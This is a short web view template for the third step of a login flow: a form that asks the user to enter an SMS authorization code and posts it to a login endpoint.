@layout('layouts.app')

@section('content')
<div class="cb-login-static-alert cb-login-message cb-login-alert-message cb-loginFormArea"></div>

<div class="cb-login-form cb-loginFormArea">
  <form class="cb-form" action="/auth/login/3" method="POST">
    <div class="field">
      <label class="cb-login-field" for="otp">An authorization code was sent to you via text to your mobile number.
        <br><br> Check your mobile phone and enter the authorization code:</label>
      <input id="otp" name="otp" class="mrg-T-sm form-control cb-text-field" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">
    </div>

    <div id="userLinks">
      <button class="logon-submit btn-primary btn-block pointer btn disabled" disabled="">
        <div class="icon"></div>
        Log In
      </button>
    </div>
  </form>
</div>
@endsection